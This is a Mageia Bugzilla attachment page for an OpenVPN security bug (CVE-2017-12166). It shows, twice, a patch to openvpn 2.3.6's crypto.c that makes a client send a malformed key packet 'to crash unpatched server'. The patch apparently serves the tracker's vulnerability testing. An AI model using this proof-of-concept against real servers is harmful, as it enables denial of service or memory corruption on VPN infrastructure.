Mageia Bugzilla – Attachment 9733 Details for
Bug 21780
openvpn new security issue CVE-2017-12166
Home
|
New
|
Browse
|
Search
|
[?]
|
Reports
|
Requests
|
Help
|
Log In
[x]
|
New Account
|
Forgot Password
[patch]
Patch against openvpn 2.3.6 to exploit CVE-2017-12166
openvpn-2.3.6_exploit_test.patch (text/plain), 1.13 KB, created by
Josua Dietze
on 2017-10-16 22:50:24 CEST
(
hide
)
Description:
Patch against openvpn 2.3.6 to exploit CVE-2017-12166
Filename:
MIME Type:
Creator:
Josua Dietze
Created:
2017-10-16 22:50:24 CEST
Size:
1.13 KB
patch
obsolete
>--- openvpn-2.3.6/src/openvpn/crypto.c.orig 2017-10-16 20:05:17.712131045 +0200 >+++ openvpn-2.3.6/src/openvpn/crypto.c 2017-10-16 20:15:36.758173788 +0200 >@@ -1233,15 +1233,28 @@ write_key (const struct key *key, const > ASSERT (kt->cipher_length <= MAX_CIPHER_KEY_LENGTH > && kt->hmac_length <= MAX_HMAC_KEY_LENGTH); > >- if (!buf_write (buf, &kt->cipher_length, 1)) >- return false; >- if (!buf_write (buf, &kt->hmac_length, 1)) >+/* Create fake key packet to crash unpatched server */ >+ >+ uint8_t fake_len = 0x7f; >+ uint8_t fake_data[0xff]; >+ >+ if (!buf_write(buf, &fake_len, 1)) > return false; >- if (!buf_write (buf, key->cipher, kt->cipher_length)) >+ if (!buf_write(buf, &fake_len, 1)) > return false; >- if (!buf_write (buf, key->hmac, kt->hmac_length)) >+ if (!buf_write(buf, fake_data, 0xff)) > return false; > >+ >+// if (!buf_write (buf, &kt->cipher_length, 1)) >+// return false; >+// if (!buf_write (buf, &kt->hmac_length, 1)) >+// return false; >+// if (!buf_write (buf, key->cipher, kt->cipher_length)) >+// return false; >+// if (!buf_write (buf, key->hmac, kt->hmac_length)) >+// return false; >+ > return true; > } >
--- openvpn-2.3.6/src/openvpn/crypto.c.orig 2017-10-16 20:05:17.712131045 +0200 +++ openvpn-2.3.6/src/openvpn/crypto.c 2017-10-16 20:15:36.758173788 +0200 @@ -1233,15 +1233,28 @@ write_key (const struct key *key, const ASSERT (kt->cipher_length <= MAX_CIPHER_KEY_LENGTH && kt->hmac_length <= MAX_HMAC_KEY_LENGTH); - if (!buf_write (buf, &kt->cipher_length, 1)) - return false; - if (!buf_write (buf, &kt->hmac_length, 1)) +/* Create fake key packet to crash unpatched server */ + + uint8_t fake_len = 0x7f; + uint8_t fake_data[0xff]; + + if (!buf_write(buf, &fake_len, 1)) return false; - if (!buf_write (buf, key->cipher, kt->cipher_length)) + if (!buf_write(buf, &fake_len, 1)) return false; - if (!buf_write (buf, key->hmac, kt->hmac_length)) + if (!buf_write(buf, fake_data, 0xff)) return false; + +// if (!buf_write (buf, &kt->cipher_length, 1)) +// return false; +// if (!buf_write (buf, &kt->hmac_length, 1)) +// return false; +// if (!buf_write (buf, key->cipher, kt->cipher_length)) +// return false; +// if (!buf_write (buf, key->hmac, kt->hmac_length)) +// return false; + return true; }
View Attachment As Diff
View Attachment As Raw
Actions:
View
|
Diff
Attachments on
bug 21780
:
9716
| 9733